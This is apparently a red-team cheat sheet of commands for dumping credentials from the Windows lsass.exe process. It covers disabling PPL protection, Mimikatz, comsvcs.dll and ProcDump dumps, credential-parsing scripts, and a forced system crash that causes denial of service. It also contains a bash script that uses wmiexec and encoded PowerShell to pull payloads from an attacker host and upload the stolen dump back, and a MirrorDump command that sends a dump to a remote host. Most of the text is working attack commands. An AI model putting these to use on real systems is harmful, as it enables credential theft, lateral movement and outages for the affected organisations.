# lsass.exe
*
*
## Enumeration
*
Check if lsass.exe is ran as a protected process (PPL):
```
PS > Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
```
A legit way to disable it via [LSA Protected Process Opt-out](https://www.microsoft.com/en-us/download/details.aspx?id=40897):
```batch
mountvol X: /s
copy C:\LSAPPLConfig.efi X:\EFI\Microsoft\Boot\LSAPPLConfig.efi /Y
bcdedit /create {0cb3b571-2f2e-4343-a879-d86a476d7215} /d "DebugTool" /application osloader
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} path "\EFI\Microsoft\Boot\LSAPPLConfig.efi"
bcdedit /set {bootmgr} bootsequence {0cb3b571-2f2e-4343-a879-d86a476d7215}
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} loadoptions %1
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} device partition=X:
mountvol X: /d
shutdown -r -t 0
```
## MiniDumpWriteDump
### Parsers
*
*
*
*
### Custom Implementations
*
*
*
*
*
*
### MiniDump Callbacks
*
*
*
## Reusing Open Handles
*
*
### pypykatz
*
```
Cmd > .\pypykatz.exe live lsa --method handledup
```
### SharpHandler
*
*
Scan if there are dupeable handles to use:
```
PS > Invoke-SharpHandler -C "-s"
```
Write a gzip-compressed minidump to specified location:
```
PS > Invoke-SharpHandler -C "-w -c -l=C:\Windows\Temp\pony.dat"
```
Dump and parse with SharpKatz's `logonpasswords`:
```
PS > Invoke-SharpHandler -C "-d"
```
### HandleKatz
*
```
$ x86_64-w64-mingw32-gcc -o loader.exe loader.cpp -lcrypt32
Cmd > .\loader.exe --pid:852 --outfile:C:\Windows\Temp\dump.obfuscated
```
### LetMeowIn
*
## Silent Process Exit
*
*
*
*
*
## Remove PPL Protection
*
*
*
*
*
*
*
*
Using Mimikatz driver:
```
PS > sc.exe create mimidrv binPath= C:\Windows\Tasks\mimidrv.sys type= kernel start= demand
PS > sc.exe start mimidrv
PS > Invoke-Mimikatz -Command '"!processprotect /process:lsass.exe /remove" "exit"'
```
## Load SSP
*
*
*
*
*
### SspirConnectRpc
*
*
### MirrorDump
*
*
```
Cmd > .\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824
Cmd > .\MirrorDump.exe --parse
$ python3 MirrorDump.py 0.0.0.0 31337 --md5 --parse
Cmd > .\MirrorDump.exe --host 10.10.13.37 --port 31337
```
### DuplicateDump
*
### nanodump
*
*
```
Cmd > .\load_ssp.x64.exe C:\Windows\Temp\nanodump_ssp.x64.dll
beacon> load_ssp
```
Do it automatically with `wmiexec.py` magic (using [this](https://gist.github.com/mildred/67d22d7289ae8f16cae7) Python HTTP server with PUT support):
{% code title="nanodump\_ssp.sh" %}
```bash
#!/usr/bin/env bash
# Usage: sudo nanodump_ssp.sh <[DOMAIN\]USERNAME>:
# Example: sudo nanodump_ssp.sh 'megacorp.local\snovvcrash:Passw0rd!' 192.168.1.11 10.10.13.37 80
CREDS=$1
RHOST=$2
LHOST=$3
LPORT=$4
CMD="IWR -Uri http://${LHOST}/a.exe -OutFile C:\Windows\Temp\a.exe;IWR -Uri http://${LHOST}/a.dll -OutFile C:\Windows\Temp\a.dll;C:\Windows\Temp\a.exe C:\Windows\Temp\a.dll"
CMD_BASE64=`echo -n ${CMD} | iconv -t UTF-16LE | base64 -w0`
python3 -m http.server ${LPORT} &
wmiexec.py -silentcommand -nooutput ${CREDS}@${RHOST} "powershell -enc ${CMD_BASE64}"
sleep 10
kill -9 `netstat -tulpan | grep ${LPORT} | grep python | awk '{ print $7 }' | awk -F/ '{ print $1 }'`
python3 put.py --bind=0.0.0.0 ${LPORT} &
CMD="IWR -Uri http://${LHOST}/out.bin -Method PUT -InFile C:\Windows\Temp\report.docx;rm C:\Windows\Temp\a.exe;rm C:\Windows\Temp\a.dll;rm C:\Windows\Temp\report.docx"
CMD_BASE64=`echo -n ${CMD} | iconv -t UTF-16LE | base64 -w0`
wmiexec.py -silentcommand -nooutput ${CREDS}@${RHOST} "powershell -enc ${CMD_BASE64}"
sleep 30
kill -9 `netstat -tulpan | grep ${LPORT} | grep python | awk '{ print $7 }' | awk -F/ '{ print $1 }'`
bash restore_signature.sh out.bin
pypykatz lsa minidump out.bin
chown ${SUDO_USER}:${SUDO_USER} out.bin
```
{% endcode %}
#### RToolZ
*
## Bypass Saving on Disk Detection
*
*
## NTFS Transactions
### TransactedSharpMiniDump
*
*
### CredBandit
*
*
*
*
### Dumpy
*
## Kernel Mode
*
### Abusing Gigabyte Driver
**CVE-2018-19320**
*
*
*
*
*
## Physical Memory
Convert VMware snapshot to a memory dump with [vmss2core](https://kb.vmware.com/s/article/2003941):
```
Cmd > vmss2core.exe -W/-W8 Snapshot.vmsn Snapshot.vmem
```
### Crash Dumps
*
Get current `CrashControl` settings and set `CrashDumpEnabled` to **0x01** (default dump location is `C:\Windows\MEMORY.dmp`):
```
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl'
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v CrashDumpEnabled -vt REG_DWORD -vd 1
```
Crash the target machine, e. g. with [NotMyFault](https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault):
{% hint style="warning" %}
**This action causes DOS!** Do at your own risk.
{% endhint %}
```
$ cme smb 192.168.1.1 -u snovvcrash -p 'Passw0rd!' -x '\\10.10.13.37\notmyfaultc64.exe -accepteula /crash 0x03' --no-output
```
Parse LSASS with Mimikatz and [WinDbg](https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools#small-classic-windbg-preview-logo-debugging-tools-for-windows-windbg):
```
kd> .load C:\mimilib.dll
kd> .SymFix
kd> .Reload
kd> !process 0 0 lsass.exe
kd> .process /r /p fffffa80072b2b10
kd> !mimikatz
```
{% hint style="info" %}
To add debug symbols: `File` → `Symbol file path` → `SRV*https://msdl.microsoft.com/download/symbols`.
{% endhint %}
Or with [Pypykatz plugin](https://github.com/skelsec/pypykatz-volatility3) for Volatility 3:
```
$ pip install volatility3 pypykatz
$ git clone https://github.com/volatilityfoundation/volatility3 ~/tools/volatility3
$ git clone https://github.com/skelsec/pypykatz-volatility3 ~/tools/pypykatz-volatility3
$ cd ~/tools/volatility3
$ python3 vol.py -f /path/to/MEMORY.dmp -p ../pypykatz-volatility3 pypykatz
```
{% hint style="info" %}
[Current](https://github.com/skelsec/pypykatz-volatility3/blob/38c96c5d8053c38f1ac594f4c50bd54561f88534/vol_pypykatz.py) version of `vol_pypykatz.py` need some changes to work with relevant version of Volatility 3:
{% code title="vol\_pypykatz.py.patch" %}
```diff
diff --git a/vol_pypykatz.py b/vol_pypykatz.py
index 6c9592f..f53da1d 100644
--- a/vol_pypykatz.py
+++ b/vol_pypykatz.py
@@ -19,7 +19,7 @@ vollog = logging.getLogger(__name__)
class pypykatz(interfaces.plugins.PluginInterface):
- _required_framework_version = (1, 0, 0)
+ _required_framework_version = (2, 0, 0)
@classmethod
def get_requirements(cls) -> List[interfaces.configuration.RequirementInterface]:
@@ -38,18 +38,4 @@ class pypykatz(interfaces.plugins.PluginInterface):
]
def run(self):
- return renderers.TreeGrid(
- [
- ("Credential Type", str),
- ("Domain Name", str),
- ("Username", str),
- ("NThash", str),
- ("LMHash", str),
- ("SHAHash", str),
- ("masterkey", str),
- ("masterkey (sha1)", str),
- ("key_guid", str),
- ("password", str),
- ],
- pparser.go_volatility3(self),
- )
+ return pparser.go_volatility3(self)
```
{% endcode %}
{% endhint %}
### Physmem2profit
*
*
*
Server:
```
PS > .\Physmem2profit.exe --ip 192.168.1.11 --port 1337 --verbose [--hidden]
```
Client:
```
$ python3 physmem2profit --host 192.168.1.11 --port 1337 --install "C:/Windows/Temp/winpmem_x64.sys" --mode all --driver winpmem
```
## Credential Guard
Check presence ([ref](https://gist.github.com/frayos/69fe2f3fa1990478f26c289baf7ca083)):
```powershell
$DevGuard = Get-CimInstance –ClassName Win32_DeviceGuard –Namespace root\Microsoft\Windows\DeviceGuard
if ($DevGuard.SecurityServicesConfigured -contains 1) {"Credential Guard configured"}
if ($DevGuard.SecurityServicesRunning -contains 1) {"Credential Guard running"}
```
### Patch and Bypass
*
Patch the `g_fParameter_UseLogonCredential` and `g_IsCredGuardEnabled` variables by their hardcoded offsets within `wdigest.dll` loaded by LSASS:
*
*
Resolve `g_fParameter_UseLogonCredential` and `g_IsCredGuardEnabled` variable offsets dynamically at runtime:
*
*
Two PoCs above merged:
*
### PassTheChallenge
*
*
### CVE-2025-21299, CVE-2025-29809
*
## Attacking vSphere
*
*
*
## Tools
### comsvcs.dll
*
*
*
*
*
```
PS > $proc = 'ls'+'Ass'
PS > Get-Process $proc
PS > rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump C:\Windows\System32\spool\drivers\color\pony.dat full
```
Not touching the disk (using an SMB share):
```
PS > net use z: \\10.10.13.37\share
PS > rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump (Get-Process ('ls'+'Ass')).id z:\pony.dat full
```
One-liner:
```
Cmd > %COMSPEC% /Q /c echo powershell.exe -NoP -C "%WINDIR%\System32\rundll32.exe %WINDIR%\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id %WINDIR%\Temp\pony.arj full;Wait-Process -Id (Get-Process rundll32).Id" 2^>^&1 > temp.bat & %COMSPEC% /Q /c temp.bat & del temp.bat
```
### ProcDump
*
*
*
```
PS > wget http://live.sysinternals.com/PsExec64.exe -o psexec.exe
PS > .\procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
```
#### Process Argument Spoofing
*
*
### Mimikatz
*
*
```
PS > .\mimikatz.exe "privilege::debug" "token::elevate" "log out.txt" "sekurlsa::logonpasswords full" "exit"
```
{% hint style="warning" %}
In case of Windows 10 version 1803-1809 use [Mimikatz v2.1.1](https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip), see [Key import error](https://github.com/gentilkiwi/mimikatz/issues/248)
{% endhint %}
Parse MiniDump:
```
PS > .\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
```
Grep for creds:
```
$ grep -a '* Username : ' out.txt -A2 | grep -a -e Username -e Password -e NTLM | grep -a -v null | xclip -i -sel c
```
#### kiwi
```
meterpreter > getsystem
meterpreter > load kiwi
meterpreter > creds_msv
meterpreter > creds_wdigest
meterpreter > lsa_dump_secrets
meterpreter > creds_all
meterpreter > kiwi_cmd '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords full" "exit"'
```
### pypykatz
*
Install:
```
$ pipx install -f "git+https://github.com/skelsec/pypykatz.git"
$ pypykatz lsa minidump lsass.DMP [-k /tmp/krb] [-g/--grep] [-p msv wdigest kerberos]
```
Parse with jq one-liner:
```bash
pypykatz lsa minidump lsass.DMP --json > /tmp/lsass.json
cat /tmp/lsass.json | jq '.[].logon_sessions[] | "\nTime : \(.logon_time)", "Server : \(.logon_server)", (.wdigest_creds[] | select(.password != null or .password_raw != "") | "WD : \(.domainname)\\\(.username):\(.password // .password_raw)"), (.msv_creds[] | "NT : \(.domainname)\\\(.username):\(.NThash // "N/A")"), (.kerberos_creds[] | select(.password != null or .password_raw != "") | "KRB : \(.domainname)\\\(.username):\(.password // .password_raw)")' -r | tail -n +2 | bat --paging=never --theme=ansi
```
Pipe to the script to parse with colors:
{% code title="pypyparse.py" %}
```python
#!/usr/bin/python3
import re, sys
a = sys.stdin.read()
def pp(x): print(f'\033[1m[+] \033[93m{x}\033[0m')
s = set()
for m in re.findall(r'\s+Username: (.*)\n\s+Domain: (.*)\n.*\n\s+NT: (.*)', a):
u, d, h = m
if u and h: s.add(d + '\\' + f'{u}:{h}')
for i in s: pp(i)
s = set()
for m in re.findall(r'\s+Username: (.*)\n\s+Domain: (.*)\n\s+Password: (.*)', a):
u, d, p = m
if u and p: s.add(d + '\\' + f'{u}:{p}')
for i in s: pp(i)
s = set()
for m in re.findall(r'\s+username (.*)\n\s+domainname (.*)\n\s+password (.*)', a):
u, d, p = m
if u and p and p != 'None': s.add(d + '\\' + f'{u}:{p}')
for i in s: pp(i)
```
{% endcode %}
### spraykatz
*
```
$ python3 spraykatz.py -u snovvcrash -p 'Passw0rd!' -t 10.10.13.37,10.10.13.38,10.10.13.39
```
### Dumpert
*
*
Dump lsass.exe using direct syscalls and removing user-land API hooks:
```
Cmd > rundll32.exe .\Outflank-Dumpert-DLL.dll,Dump
```
Using [sRDI](https://www.netspi.com/blog/technical/adversary-simulation/srdi-shellcode-reflective-dll-injection/) (**s**hellcode **R**eflective **D**LL **I**njection) technique:
1. Compile [*Outflank-Dumpert-DLL.dll*](https://github.com/outflanknl/Dumpert/tree/master/Dumpert-DLL).
2. Convert it to position independent shellcode with [*ConvertToShellcode.py*](https://github.com/monoxgas/sRDI/blob/master/Python/ConvertToShellcode.py): `python3 ConvertToShellcode.py Outflank-Dumpert-DLL.dll`.
3. Use a shellcode loader of your choice to dump LSASS.
### lsassy
*
*
*
```
$ lsassy 10.10.13.0/24 -d megacorp.local -u snovvcrash -p 'Passw0rd!'
$ cme smb 10.10.13.0/24 -u snovvcrash -p 'Passw0rd!' -M lsassy
```
### MalSeclogon
*
*
*
```
Cmd > Malseclogon.exe -p -d 1
Cmd > Malseclogon.exe -p -d 2
```